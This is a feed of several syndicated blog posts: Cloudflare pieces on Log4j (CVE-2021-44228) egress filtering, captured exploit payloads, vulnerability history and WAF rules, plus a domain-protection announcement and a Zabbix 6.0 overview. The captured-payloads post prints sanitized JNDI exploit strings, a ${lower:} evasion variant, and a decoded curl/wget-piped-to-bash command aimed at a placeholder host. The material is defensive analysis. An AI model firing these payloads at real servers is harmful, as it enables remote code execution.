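    ALLOWED_DOMAINS = {"updates.example.com", "packages.example.com"}  # placeholders

    def dns_policy(query_name: str) -> str:
        """Return 'allow' only when the query matches an approved domain."""
        name = query_name.rstrip(".").lower()
        if any(name == d or name.endswith("." + d) for d in ALLOWED_DOMAINS):
            return "allow"
        return "block"  # new and arbitrary destinations are blocked by default

    print(dns_policy("updates.example.com"))          # allow
    print(dns_policy("attacker-controlled.example"))  # block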

> Ready to get started today? You can begin filtering and logging all of the DNS queries made by your servers or your entire network with these instructions here.

Second, secure network traffic leaving your infrastructure

Protective DNS filtering can add security and visibility in minutes, but bad actors can target all of the other ways that your servers communicate out to the rest of the Internet. Historically, organizations deployed network firewalls in their data centers to filter the traffic entering and exiting their network. Their teams ran capacity planning exercises, purchased the appliances, and deployed hardware. Some of these appliances eventually moved to the cloud, but the pain of deployment stayed mostly the same.

Cloudflare One’s network firewall helps your team secure all of your network’s traffic through a single, cloud-native solution that does not require you to manage any hardware or virtual appliances. Deploying this level of security only requires that you decide how you want to send traffic to Cloudflare. You can connect your network through multiple on-ramp options, including network layer (GRE or IPsec tunnels), direct connections, and a device client.

Once connected, traffic leaving your network will first route through a Cloudflare data center. Cloudflare’s network will apply filters at layers 3 through 5 of the OSI model. Your administrators can then create policies based on IP, port, and protocol, with both stateless and stateful options. If you want to save even more time, Cloudflare uses the data we have about threats on the Internet to create managed lists for you that you can block with a single click.

Similar to DNS queries, if you know that your servers and services in your network only need to reach specific IPs or ports, you can build a positive security model with allow-list rules that restrict connections and traffic to just the destinations you specify. In either model, Cloudflare’s network will handle logging for you. Your team can export these logs to your SIEM for audit retention or additional analysis if you need to investigate a potential attack.

> Ready to get started securing your network? Follow the guide here and tell us you’d like to get started and we’ll be ready to help your team.

Third, inspect and filter HTTP traffic

Some attacks will rely on convincing your servers and endpoints to send HTTP requests to specific destinations, leaking data or grabbing malware to download in your infrastructure. To help solve that challenge, you can layer HTTP inspection, virus scanning, and logging in Cloudflare’s network.

If you completed Step Two above, you can use the same on-ramp that you configured to upgrade UDP and TCP traffic, where Cloudflare’s Secure Web Gateway can apply HTTP filtering and logging to the requests leaving your network. If you need more granular control, you can deploy Cloudflare’s client software to build rules that only apply to specific endpoints in your infrastructure.

Like every other layer in this security model, you can also only allow your servers to connect to an approved list of destinations. Cloudflare’s Secure Web Gateway will allow and log those requests and block attempts to reach any other destinations.

> Ready to begin inspecting and filtering HTTP traffic? Follow the instructions here to get started today.

What’s next?

Deploying filtering and logging today will help protect against the next attack or attempts to continue to exploit today’s vulnerability, but we’re encouraging everyone to start by patching your deployments of log4j immediately.

As we write this, we’re updating existing managed rulesets to include reports of destinations used to attempt to exploit today’s vulnerability. We’ll continue to update those policies as we learn more information.

Actual CVE-2021-44228 payloads captured in the wild

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/

I wrote earlier about how to mitigate CVE-2021-44228 in Log4j, how the vulnerability came about and Cloudflare’s mitigations for our customers. As I write we are rolling out protection for our FREE customers as well because of the vulnerability’s severity.

As we now have many hours of data on scanning and attempted exploitation of the vulnerability, we can start to look at the actual payloads being used in the wild and at some statistics. Let’s begin with requests that Cloudflare is blocking through our WAF.

We saw a slow ramp up in blocked attacks this morning (times here are UTC) with the largest peak at around 1800 (roughly 20,000 blocked exploit requests per minute). But scanning has been continuous throughout the day. We expect this to continue.

We also took a look at the number of IP addresses that the WAF was blocking. Somewhere between 200 and 400 IPs appear to be actively scanning at any given time.

So far today the largest number of scans or exploitation attempts have come from Canada and then the United States.

Lots of the blocked requests appear to be in the form of reconnaissance to see if a server is actually exploitable. The top blocked exploit string is this (throughout I have sanitized domain names and IP addresses):

${jndi:ldap://x.x.x.x/#Touch}

This looks like a simple way to hit the server at x.x.x.x, which the actor no doubt controls, and log that an Internet property is exploitable. That doesn’t tell the actor much. The second most popular request contained this:

Mozilla/5.0 ${jndi:ldap://x.x.x.x:5555/ExploitD}/ua

This appeared in the User-Agent field of the request. Notice how at the end of the URI it says /ua. No doubt a clue to the actor that the exploit worked in the User-Agent.

Another interesting payload shows that the actor was detailing the format that worked (in this case a non-encrypted request to port 443 and they were trying to use http://):

${jndi:http://x.x.x.x/callback/https-port-443-and-http-callback-scheme}

Someone tried to pretend to be the Googlebot and included some extra information.

Googlebot/2.1 (+http://www.google.com/bot.html)${jndi:ldap://x.x.x.x:80/Log4jRCE}

In the following case the actor was hitting a public Cloudflare IP and encoded that IP address in the exploit payload. That way they could scan many IPs and find out which were vulnerable.

${jndi:ldap://enq0u7nftpr.m.example.com:80/cf-198-41-223-33.cloudflare.com.gu}

A variant on that scheme was to include the name of the attacked website in the exploit payload.

${jndi:ldap://www.blogs.example.com.gu.c1me2000ssggnaro4eyyb.example.com/www.blogs.example.com}

Some actors didn’t use LDAP but went with DNS. However, LDAP is by far the most common protocol being used.

${jndi:dns://aeutbj.example.com/ext}

A very interesting scan involved using Java and standard Linux command-line tools. The payload looks like this:

${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN1cmwgLXMgeC54LngueDo1ODc0L3kueS55Lnk6NDQzfHx3Z2V0IC1xIC1PLSB4LngueC54OjU4NzQveS55LnkueTo0NDMpfGJhc2g=}

The base64 encoded portion decodes to a curl and wget piped into bash.

(curl -s x.x.x.x:5874/y.y.y.y:443||wget -q -O- x.x.x.x:5874/y.y.y.y:443)|bash

Note that the output from the curl/wget is not required and so this is just hitting a server to indicate to the actor that the exploit worked.
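
You can reproduce that decoding yourself; a quick sketch using the sanitized payload above:

    import base64

    encoded = "KGN1cmwgLXMgeC54LngueDo1ODc0L3kueS55Lnk6NDQzfHx3Z2V0IC1xIC1PLSB4LngueC54OjU4NzQveS55LnkueTo0NDMpfGJhc2g="

    # Prints the curl/wget command piped into bash shown above.
    print(base64.b64decode(encoded).decode())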

Lastly, we are seeing active attempts to evade simplistic blocking of strings like ${jndi:ldap by using other features of Log4j. For example, a common evasion technique appears to be to use the ${lower} feature (which lowercases characters) as follows:

${jndi:${lower:l}${lower:d}a${lower:p}://example.com/x
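
As a simplified illustration of why matching on a literal string like ${jndi:ldap is not enough, and of how such lookups can be normalized before matching (this is only a sketch of the idea, not Cloudflare’s actual WAF logic):

    import re

    LOOKUP = re.compile(r"\$\{(lower|upper):([^}])\}")

    def normalize(payload: str) -> str:
        """Collapse ${lower:x}/${upper:x} lookups into the character they produce."""
        prev = None
        while prev != payload:
            prev = payload
            payload = LOOKUP.sub(
                lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
                payload,
            )
        return payload

    sample = "${jndi:${lower:l}${lower:d}a${lower:p}://example.com/x"
    print(normalize(sample))                       # ${jndi:ldap://example.com/x
    print("${jndi:" in normalize(sample).lower())  # True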

At this time there appears to be a lot of reconnaissance going on. Actors, good and bad, are scanning for vulnerable servers across the world. Eventually, some of that reconnaissance will turn into actual penetration of servers and companies. And, because logging is so deeply embedded in front end and back end systems, some of that won’t become obvious for hours or days.

Like spores quietly growing underground some will break through the soil and into the light.

Cloudflare’s security teams are working continuously as the exploit attempts evolve and will update WAF and firewall rules as needed.

Inside the log4j2 vulnerability (CVE-2021-44228)

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/

Yesterday, December 9, 2021, a very serious vulnerability in the popular Java-based logging package log4j was disclosed. This vulnerability allows an attacker to execute code on a remote server; a so-called Remote Code Execution (RCE). Because of the widespread use of Java and log4j this is likely one of the most serious vulnerabilities on the Internet since both Heartbleed and ShellShock.

It is CVE-2021-44228 and affects version 2 of log4j between versions 2.0-beta9 and 2.14.1. It is not present in version 1 of log4j and is patched in 2.15.0.

In this post we explain the history of this vulnerability, how it was introduced, and how Cloudflare is protecting our clients. We will update this post later with examples of actual attempted exploitation that we are seeing blocked by our firewall service.

Cloudflare uses some Java-based software and our teams worked to ensure that our systems were not vulnerable or that this vulnerability was mitigated. In parallel, we rolled out firewall rules to protect our customers.

But, if you work for a company that is using Java-based software that uses log4j, you should immediately read the section on how to mitigate and protect your systems before reading the rest.

How to Mitigate CVE-2021-44228

To mitigate this vulnerability, the following options are available (see the advisory from Apache here; a quick way to verify option 3 is sketched after the list):

1. Upgrade to log4j v2.15

2. If you are using log4j v2.10 or above, and cannot upgrade, then set the property

log4j2.formatMsgNoLookups=true

3. Or remove the JndiLookup class from the classpath. For example, you can run a command like

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

to remove the class from the log4j-core.
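
If you choose option 3, here is a minimal sketch for confirming that the class is actually gone from a jar afterwards (the jar path is a placeholder; shaded jars that bundle log4j classes need to be checked too):

    import sys, zipfile

    jar_path = sys.argv[1]  # e.g. the log4j-core jar you just modified
    with zipfile.ZipFile(jar_path) as jar:
        hits = [name for name in jar.namelist() if name.endswith("JndiLookup.class")]

    if hits:
        print("JndiLookup still present:", hits)
    else:
        print("JndiLookup not found")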

Vulnerability History

In 2013, in version 2.0-beta9, the log4j package added the “JNDILookup plugin” in issue LOG4J2-313. To understand how that change creates a problem, it’s necessary to understand a little about JNDI: Java Naming and Directory Interface.

JNDI has been present in Java since the late 1990s. It is a directory-access API that allows a Java program to find data (in the form of a Java object) through a directory service. JNDI has a number of service provider interfaces (SPIs) that enable it to use a variety of directory services.

For example, SPIs exist for the CORBA COS (Common Object Service), the Java RMI (Remote Method Invocation) Registry, and LDAP. LDAP is a very popular directory service (the Lightweight Directory Access Protocol) and is the primary focus of CVE-2021-44228 (although other SPIs could potentially also be used).

A Java program can use JNDI and LDAP together to find a Java object containing data that it might need. For example, in the standard Java documentation there’s an example that talks to an LDAP server to retrieve attributes from an object. It uses the URL ldap://localhost:389/o=JNDITutorial to find the JNDITutorial object from an LDAP server running on the same machine (localhost) on port 389 and goes on to read attributes from it.

As the tutorial says “If your LDAP server is located on another machine or is using another port, then you need to edit the LDAP URL”. Thus the LDAP server could be running on a different machine and potentially anywhere on the Internet. That flexibility means that if an attacker could control the LDAP URL they’d be able to cause a Java program to load an object from a server under their control.

That’s the basics of JNDI and LDAP; a useful part of the Java ecosystem.

But in the case of log4j an attacker can control the LDAP URL by causing log4j to try to write a string like ${jndi:ldap://example.com/a}. If that happens then log4j will connect to the LDAP server at example.com and retrieve the object.

This happens because log4j contains special syntax in the form ${prefix:name} where prefix is one of a number of different Lookups where name should be evaluated. For example, ${java:version} is the current running version of Java.

LOG4J2-313 added a jndi Lookup as follows: “The JndiLookup allows variables to be retrieved via JNDI. By default the key will be prefixed with java:comp/env/, however if the key contains a “:” no prefix will be added.”

With a : present in the key, as in ${jndi:ldap://example.com/a}, there is no prefix and the LDAP server is queried for the object. These Lookups can be used both in the configuration of log4j and when lines are logged.

So all an attacker has to do is find some input that gets logged and add something like  ${jndi:ldap://example.com/a}. This could be a common HTTP header like User-Agent (that commonly gets logged) or perhaps a form parameter like username that might also be logged.

This is likely very common in Java-based Internet facing software that uses log4j. More insidious is that non-Internet facing software that uses Java can also be exploitable as data gets passed from system to system. For example, a User-Agent string containing the exploit could be passed to a backend system written in Java that does indexing or data science and the exploit could get logged. This is why it is vital that all Java-based software that uses log4j version 2 is patched or has mitigations applied immediately. Even if the Internet-facing software is not written in Java it is possible that strings get passed to other systems that are in Java allowing the exploit to happen.

And Java is used for many more systems than just those that are Internet facing. For example, it’s not hard to imagine a package handling system that scans QR codes on boxes, or a contactless door key both being vulnerable if they are written in Java and use log4j. In one case a carefully crafted QR code might contain a postal address containing the exploit string; in the other a carefully programmed door key could contain the exploit and be logged by a system that keeps track of entries and exits.

And systems that do periodic work might pick up the exploit and log it later. So the exploit could lay dormant until some indexing, rollup, or archive process written in Java inadvertently logs the bad string. Hours or even days later.

Cloudflare Firewall Protection

Cloudflare rolled out protection for our customers using our Firewall in the form of rules that block the jndi Lookup in common locations in an HTTP request. This is detailed here. We have continued to refine these rules as attackers have modified their exploits and will continue to do so.

Introducing Cloudflare Domain Protection — Making Domain Compromise a Thing of the Past

Post Syndicated from Eric Brown original https://blog.cloudflare.com/introducing-domain-protection/

Everything on the web starts with a domain name. It is the foundation on which a company’s online presence is built. If that foundation is compromised, the damage can be immense.

As part of CIO Week, we looked at all the biggest risks that companies continue to face online, and how we could address them. The compromise of a domain name remains one of the greatest. There are many ways in which a domain may be hijacked or otherwise compromised, all the way up to the most serious: losing control of your domain name altogether.

You don’t want it to happen to you. Imagine not just losing your website, but all your company’s email, a myriad of systems tied to your corporate domain, and who knows what else. Having an attacker compromise your corporate domain is the stuff of nightmares for every CIO. And, if you’re a CIO and it’s not something you’re worrying about, know that we literally surveyed every other domain registrar and were so unsatisfied with their security practices we needed to launch our own.

But, now that we have, we want to make domain compromise something that should never, ever happen again. For that reason, we’re excited to announce that we are extending a new level of domain record protection to all our Enterprise customers. We call it Cloudflare Domain Protection, and we’re including it for free for every Cloudflare Enterprise customer. For those customers who have domains secured by Domain Protection, we will also waive all registration and renewal fees on those domains. Cloudflare Domain Protection will be available in Q1 — you can speak to your account manager now to take advantage of the offer.

It’s not possible to build a truly secure domain registrar solution without an understanding of how a domain gets compromised. Before we get into more details of our offering, we wanted to take you on a tour of how a domain can get compromised.

Stealing the Keys to Your Kingdom

There are three types of domain compromises that we often hear about. Let’s take a look at each of them.

Domain Transfers

One of the most serious compromises is an unauthorized transfer of the domain to another registrar. While cooperation amongst registrars has improved greatly over the years, it can still be very difficult to recover a stolen domain. It can often take weeks — or even months. It may require legal action. In a best case scenario, the domain may be recovered in a few days; in the worst case, you may never get it back.

The ability to easily transfer a domain between registrars is vitally important, and is part of what keeps the market for domain registration competitive. However, it also introduces potential risk. The transfer process used by most registries involves using a token to authorize the transfer. Prior to the widespread practice of redacting publicly accessible whois data, an email approval process was also used. To steal a domain, a malicious actor only needs to gain access to the authorization code and be able to remove any domain locks.

Unauthorized transfers start often with a compromised account. In many cases, the customer may have their account credentials compromised. In other cases, attackers use elaborate social engineering schemes to take control of the domain, often moving the domain between registrar accounts before transferring the domain to another registrar.

Name Server Updates

Name server updates are another way in which domains may be compromised. Whereas a domain transfer is typically an attempt to permanently take over a domain, a name server update is more temporary in nature. However, even if the update can usually be quickly reversed, these types of domain hijacks can be very damaging. They open the possibility of stolen customer data and intercepted email traffic. But most of all: they open an organization up to very serious reputational damage.

Domain Suspensions and Deletions

Most domain suspensions and deletions are not the result of malicious activity, but rather, they often happen through human error or system failures. In many cases, the customer forgets to renew a domain or neglects to update their payment method. In other cases, the registrar mistakenly suspends or deletes a domain.

Regardless of the reason though: the result is a domain that no longer resolves.

While these are certainly not the only ways in which domains may be compromised, they are some of the most damaging. We have spent a lot of time focused on these types of compromises and how to prevent them from happening.

A Different Approach to Domains

Like a lot of folks, we’ve long been frustrated by the state of the domain business. And so this isn’t our first rodeo here.

We already have a registrar service — Cloudflare Registrar — which is open to any Cloudflare customer. We make it super easy to get started, to integrate with Cloudflare, and there’s no markup on our pricing — we promise to never charge you anything more than the wholesale price each TLD charges. The aim: no more “bait and switch” and “endless upsell” (which, according to our customers, are the two most common terms associated with the domain industry). Instead, it’s a registrar that you love. Obviously, it’s Cloudflare, so we incorporated a number of security best practices into how it operates, too.

For our most demanding enterprise customers, we also have Custom Domain Protection. Every client using Custom Domain Protection defines their own process for updating records. As we said when we introduced it: “if a Custom Domain Protection client wants us to not change their domain records unless six different individuals call us, in order, from a set of predefined phone numbers, each reading multiple unique pass codes, and telling us their favorite ice cream flavor, on a Tuesday that is also a full moon, we will enforce that. Literally.”

Yes, it’s secure, but it’s also not the most scalable solution. As a result, we charge a premium for it. As we spoke to our Enterprise customers, however, there was a need for something in between — a Goldilocks solution, so to speak, that offers a high level of protection without being quite so custom.

Enter Cloudflare Domain Protection.

A Triple-Locked Approach

Our approach to securing domains with Domain Protection is quite straightforward: identify the various attack vectors, and design a layered security model to address each potential threat.

Before we take a look at each security layer, it’s important to understand the relationship between registrars and registries, and how that impacts domain security. You can think of registries as the wholesaler of domain names. They manage the central database of all registered domains within the Top-Level-Domain (TLD). They are also responsible for determining the wholesale pricing and establishing TLD specific policies.

Registrars, on the other hand, are the retailer of domains and are responsible for selling the domains to the end user. With each registration, transfer, or renewal, the registrar pays the registry a transaction fee.

Registrars and registries jointly manage domain registrations in what’s called the Shared Registration System (SRS). Registrars communicate with registries using an IETF standard called the Extensible Provisioning Protocol (EPP). Embodied in the EPP standard is a set of domain statuses that registrars and registries can apply to lock the domain and prevent updates, deletions, and transfers (to another registrar).

Registrars are able to apply “client” locks, frequently referred to as Registrar Locks. Registries apply “server” locks, also known as Registry Locks. It’s important to note that the registry locks always supersede the registrar locks. This means that the registrar locks cannot be removed until the registry locks have been removed.

Now, let’s take a closer look at our planned approach.

We start by applying the EPP Registrar Locks to the domain name. These are the EPP client locks that prevent domain updates, transfers, and deletions.

We then apply an internal lock that prevents any API calls to that domain from being processed. This lock functions outside of EPP and is designed to protect the domain should the EPP locks be removed, as well as in situations where an operation may be executed outside of EPP. For example, in some TLDs the domain contact data is only stored at the registrar and never transmitted to the registry. In these cases, it’s important to have a non-EPP locking mechanism.

After the registrar locks are applied, we will request the registry to apply the Registry Locks using a special non-EPP based procedure. It’s important to note that not all registries offer Registry Lock as a service. In some instances, we may not be able to apply this last locking feature.

Lastly, a secure verification procedure is created to handle any future requests to unlock or modify the domain.
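
For illustration, you can see whether these kinds of locks are present on a domain by inspecting its EPP status codes, for example over RDAP (rdap.org is used here as a convenience redirector; RDAP reports EPP statuses such as clientTransferProhibited and serverTransferProhibited in a normalized form):

    import requests

    # Look up a domain's status codes via RDAP and flag the transfer/update/delete locks.
    resp = requests.get("https://rdap.org/domain/cloudflare.com", timeout=10)
    for status in resp.json().get("status", []):
        marker = "  <- lock" if "prohibited" in status.lower() else ""
        print(status + marker)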

Included Out of the Box

Our aim is to make Cloudflare Domain Protection the most scalable secure solution for domains that’s available. We want to ensure that the domains that matter most to our customers — the mission critical, high value domains — are securely protected.

Eligible domains that are explicitly included under a Cloudflare Enterprise contract may be included in our Domain Protection registration service at no additional cost. And, as we mentioned earlier, this will also cover registration and renewal fees — so not only will securing your domain be one less thing for you to worry about, so too will be paying for it.

Interested in applying Cloudflare Domain Protection to your domain names? Reach out to your account manager and let them know you’re interested. Additional details will be coming in early Q1, 2022.

CVE-2021-44228 – Log4j RCE 0-day mitigation

Post Syndicated from Gabriel Gabor original https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/

A zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) was made public on December 9, 2021 that results in remote code execution (RCE).

This vulnerability is actively being exploited and anyone using Log4j should update to version 2.15.0 as soon as possible. The latest version can already be found on the Log4j download page.

If updating to the latest version is not possible, customers can also mitigate exploit attempts by setting the system property “log4j2.formatMsgNoLookups” to “true”, or by removing the JndiLookup class from the classpath. Java releases 8u121 and later also restrict some of the remote class loading this exploit relies on, although upgrading Log4j remains the recommended fix.

Customers using the Cloudflare WAF can also leverage three newly deployed rules to help mitigate any exploit attempts:

  • Log4j Headers – Rule ID 100514 (legacy WAF) / 6b1cc72dff9746469d4695a474430f12 (new WAF) – default action: BLOCK
  • Log4j Body – Rule ID 100515 (legacy WAF) / 0c054d4e4dd5455c9ff8f01efe5abb10 (new WAF) – default action: LOG
  • Log4j URL – Rule ID 100516 (legacy WAF) / 5f6744fa026a4638bda5b3d7d5e015dd (new WAF) – default action: LOG

The mitigation has been split across three rules inspecting HTTP headers, body and URL respectively.

Due to the risk of false positives, customers should immediately review their Firewall Event logs and, if no false positives are found, switch the Log4j Body and URL rules to BLOCK. The rule inspecting HTTP headers has been directly deployed with a default action of BLOCK to all WAF customers.

We are continuing to monitor the situation and will update any WAF managed rules accordingly.

More details on the vulnerability can be found on the official Log4j security page.

Who is affected

Log4j is a powerful Java based logging library maintained by the Apache Software Foundation.

In all Log4j versions >= 2.0-beta9 and <= 2.14.1, JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

What’s new in Zabbix 6.0 LTS by Artūrs Lontons / Zabbix Summit Online 2021

Post Syndicated from Arturs Lontons original https://blog.zabbix.com/whats-new-in-zabbix-6-0-lts-by-arturs-lontons-zabbix-summit-online-2021/17761/

Zabbix 6.0 LTS comes packed with many new enterprise-level features and improvements. Join Artūrs Lontons and take a look at some of the major features that will be available with the release of Zabbix 6.0 LTS.

The full recording of the speech is available on the official Zabbix Youtube channel.

If we look at the Zabbix roadmap and Zabbix 6.0 LTS release in particular, we can see that one of the main focuses of Zabbix development is releasing features that solve many complex enterprise-grade problems and use cases. Zabbix 6.0 LTS aims to:

  • Solve enterprise-level security and redundancy requirements
  • Improve performance for large Zabbix instances
  • Provide additional value to different types of Zabbix users – DevOps and ITOps teams, business process owners, and managers
  • Continue to extend Zabbix monitoring and data collection capabilities
  • Provide continued delivery of official integrations with 3rd party systems

Let’s take a look at the specific Zabbix 6.0 LTS features that can guide us towards achieving these goals.

Zabbix server High Availability cluster

With the release of Zabbix 6.0 LTS, Zabbix administrators will now have the ability to deploy a Zabbix server HA cluster out-of-the-box. No additional tools are required to achieve this.

Zabbix server HA cluster supports an unlimited number of Zabbix server nodes. All nodes will use the same database backend – this is where the status of all nodes will be stored in the ha_node table. Nodes will report their status every 5 seconds by updating the corresponding record in the ha_node table.

To enable High availability, you will first have to define a new parameter in the Zabbix server configuration file: HANodeName

  • Empty by default
  • This parameter should contain an arbitrary name of the HA node
  • Providing value to this parameter will enable Zabbix server cluster mode

Standby nodes monitor the last access time of the active node from the ha_node table.

  • If the difference between last access time and current time reaches the failover delay, the cluster fails over to the standby node
  • Failover operation is logged in the Zabbix server log

It is possible to define a custom failover delay – a time window after which an unreachable active node is considered lost and failover to one of the standby nodes takes place.

As for the Zabbix proxies, the Server parameter in the Zabbix proxy configuration file now supports multiple addresses separated by a semicolon (for example, Server=zbx-node1.example.com;zbx-node2.example.com). The proxy will attempt to connect to each of the nodes until it succeeds.

Other HA cluster related features:

  • New command-line options to check HA cluster status
  • hanode.get API method to obtain the list of HA nodes
  • The new internal check provides LLD information to discover Zabbix server HA nodes
  • HA Failover event logged in the Zabbix Audit log
  • Zabbix Frontend will automatically switch to the active Zabbix server node

You can find a more detailed look at the Zabbix Server HA cluster feature in the Zabbix Summit Online 2021 speech dedicated to the topic.
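
For example, the hanode.get API method mentioned above can be called like any other Zabbix API method. A minimal sketch (the frontend URL and API token are placeholders, and the returned fields may vary between releases):

    import requests

    ZABBIX_API = "https://zabbix.example.com/api_jsonrpc.php"  # placeholder
    API_TOKEN = "your-api-token"                               # placeholder

    payload = {
        "jsonrpc": "2.0",
        "method": "hanode.get",           # new in Zabbix 6.0 LTS
        "params": {"output": "extend"},
        "auth": API_TOKEN,
        "id": 1,
    }

    resp = requests.post(ZABBIX_API, json=payload, timeout=10)
    for node in resp.json().get("result", []):
        print(node)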

Business service monitoring

The Services section has received a complete redesign in Zabbix 6.0 LTS. Business Service Monitoring (BSM) enables Zabbix administrators to define services of varying complexity and monitor their status.

BSM provides added value in a multitude of use cases, where we wish to define and monitor services based on:

  • Server clusters
  • Services that utilize load balancing
  • Services that consist of a complex IT stack
  • Systems with redundant components in place
  • And more

Business Service monitoring has been designed with scalability in mind. Zabbix is capable of monitoring over 100k services on a single Zabbix instance.

For our Business Service example, we used a website, which depends on multiple components such as the network connection, DB backend, Application server, and more. The service status calculation is done by utilizing tags: whether an existing problem affects the service is decided based on its problem tags.

In Zabbix 6.0 LTS there are many ways in which service status calculations can be performed. In case of a problem, the service state can be changed to:

  • The most critical problem severity, based on the child service problem severities
  • The most critical problem severity, based on the child service problem severities, only if all child services are in a problem state
  • The service is set to constantly be in an OK state

Changing the service status to a specific problem severity if (see the sketch after this list):

  • At least N or N% of child services have a specific status
  • Define service weights and calculate the service status based on the service weights
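
As a conceptual sketch of the “at least N or N%” rule (this is only an illustration of the idea; Zabbix evaluates these rules server-side):

    def service_status(child_severities, threshold_n=None, threshold_pct=None, severity=4):
        """Return `severity` if enough child services are in a problem state, else 0 (OK)."""
        problems = [s for s in child_severities if s > 0]
        if threshold_n is not None and len(problems) >= threshold_n:
            return severity
        if threshold_pct is not None and child_severities and \
                100 * len(problems) / len(child_severities) >= threshold_pct:
            return severity
        return 0

    print(service_status([0, 3, 4, 0], threshold_n=2))     # 4: two children have problems
    print(service_status([0, 3, 0, 0], threshold_pct=50))  # 0: only 25% have problems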

There are many other additional features, all of which are covered in our Zabbix Summit Online 2021 speech dedicated to Business Service monitoring:

  • Ability to define permissions on specific services
  • SLA monitoring
  • Business Service root cause analysis
  • Receive alerts and react on Business Service status change
  • Define Business Service permissions for multi-tenant environments

New Audit log schema

The existing audit log has been redesigned from scratch and now supports detailed logging for both Zabbix server and Zabbix frontend operations:

  • Zabbix 6.0 LTS introduces a new database structure for the Audit log
  • Collision resistant IDs (CUID) will be used for ID generation to prevent audit log row locks
  • Audit log records will be added in bulk SQL requests
  • Introducing Recordset ID column. This will help users recognize which changes have been made in a particular operation

The goal of the Zabbix 6.0 LTS audit log redesign is to provide reliable and detailed audit logging while minimizing the potential performance impact on large Zabbix instances:

  • Detailed logging of both Zabbix frontend and Zabbix server records
  • Designed with minimal performance impact in mind
  • Accessible via Zabbix API

Implementing the new audit log schema is an ongoing effort – further improvements will be done throughout the Zabbix update life cycle.

Machine learning

New trend functions have been added which utilize machine learning to perform anomaly detection and baseline monitoring:

  • New trend function – trendstl, allows you to detect anomalous metric behavior
  • New trend function – baselinewma, returns baseline by averaging data periods in seasons
  • New trend function – baselinedev, returns the number of standard deviations

An in-depth look into Machine learning in Zabbix 6.0 LTS is covered in our Zabbix Summit Online 2021 speech dedicated to machine learning, anomaly detection, and baseline monitoring.

New ways to visualize your data

Collecting and processing metrics is just a part of the monitoring equation. Visualization and the ability to display our infrastructure status in a single pane of glass are also vital to large environments. Zabbix 6.0 LTS adds multiple new visualization options while also improving the existing features.

  • The data table widget allows you to create a summary view for the related metric status on your hosts
  • The Top N and Bottom N functions of the data table widget allow you to have an overview of your highest or lowest item values
  • The single item widget allows you to display values for a single metric
  • Improvements to the existing vector graphs such as the ability to reference individual items and more
  • The SLA report widget displays the current SLA for services filtered by service tags

We are proud to announce that Zabbix 6.0 LTS will provide a native Geomap widget. Now you can take a look at the current status of your IT infrastructure on a geographic map:

  • The host coordinates are provided in the host inventory fields
  • Users will be able to filter the map by host groups and tags
  • Depending on the map zoom level – the hosts will be grouped into a single object
  • Support of multiple Geomap providers, such as OpenStreetMap, OpenTopoMap, Stamen Terrain, USGS US Topo, and others

Zabbix agent – improvements and new items

Zabbix agent and Zabbix agent 2 have also received some improvements. From new items to improved usability – both Zabbix agents are now more flexible than ever. The improvements include such features as:

  • New items to obtain additional file information such as file owner and file permissions
  • New item which can collect agent host metadata as a metric
  • New item with which you can count matching TCP/UDP sockets
  • It is now possible to natively monitor your SSL/TLS certificates with a new Zabbix agent2 item. The item can be used to validate a TLS/SSL certificate and provide you additional certificate details
  • User parameters can now be reloaded without having to restart the Zabbix agent

In addition, a major improvement to introducing new Zabbix agent 2 plugins has been made. Zabbix agent 2 now supports loading stand-alone plugins without having to recompile the Zabbix agent 2.

Custom Zabbix password complexity requirements

One of the main improvements to Zabbix security is the ability to define flexible password complexity requirements. Zabbix Super admins can now define the following password complexity requirements:

  • Set the minimum password length
  • Define password character requirements
  • Mitigate the risk of a dictionary attack by prohibiting the usage of the most common password strings

UI/UX improvements

Improving and simplifying the existing workflows is always a priority for every major Zabbix release. In Zabbix 6.0 LTS we’ve added many seemingly simple improvements, that have major impacts related to the “feel” of the product and can make your day-to-day workflows even smoother:

  • It is now possible to create hosts directly from Monitoring – Hosts
  • Removed the Monitoring – Overview section. For improved user experience, the trigger and data overview functionality can now be accessed only via dashboard widgets.
  • The default type of information for items will now be selected automatically depending on the item key.
  • The simple macros in map labels and graph names have been replaced with expression macros to ensure consistency with the new trigger expression syntax

New templates and integrations

Adding new official templates and integrations is an ongoing process, and Zabbix 6.0 LTS is no exception. Here’s a preview of some of the new templates and integrations that you can expect in Zabbix 6.0 LTS:

  • f5 BIG-IP
  • Cisco ASAv
  • HPE ProLiant servers
  • Cloudflare
  • InfluxDB
  • Travis CI
  • Dell PowerEdge

Zabbix 6.0 also brings a new GitHub webhook integration which allows you to generate GitHub issues based on Zabbix events!

Other changes and improvements

But that’s not all! There are more features and improvements that await you in Zabbix 6.0 LTS. From overall performance improvements on specific Zabbix components, to brand new history functions and command-line tool parameters:

  • Detect continuous increase or decrease of values with new monotonic history functions
  • Added utf8mb4 as a supported MySQL character set and collation
  • Added the support of additional HTTP methods for webhooks
  • Timeout settings for Zabbix command-line tools
  • Performance improvements for Zabbix Server, Frontend, and Proxy

Questions and answers

Q: How can you configure geographical maps? Are they similar to regular maps?

A: Geomaps can be used as a Dashboard widget. First, you have to select a Geomap provider in the Administration – General – Geographical maps section. You can either use the pre-defined Geomap providers or define a custom one. Then, you need to make sure that the Location latitude and Location longitude fields are configured in the Inventory section of the hosts which you wish to display on your map. Once that is done, simply deploy a new Geomap widget, filter the required hosts and you’re all set. Geomaps are currently available in the latest alpha release, so you can get some hands-on experience right now.

Q: Any specific performance improvements that we can discuss at this point for Zabbix 6.0 LTS?

A: There have been quite a few. From the frontend side – we have improved the underlying queries that are related to linking new templates, therefore the template linkage performance has increased. This will be very noticeable in large instances, especially when linking or unlinking many templates in a single go.
There have also been improvements to Server – Proxy communication. Specifically – the logic of how proxy frees up uncompressed data. We’ve also introduced improvements on the DB backend side of things – from general improvements to existing queries/logic, to the introduction of primary keys for history tables, which we are still extensively testing at this point.

Q: Will you still be able to change the type of information manually, in case you have some advanced preprocessing rules?

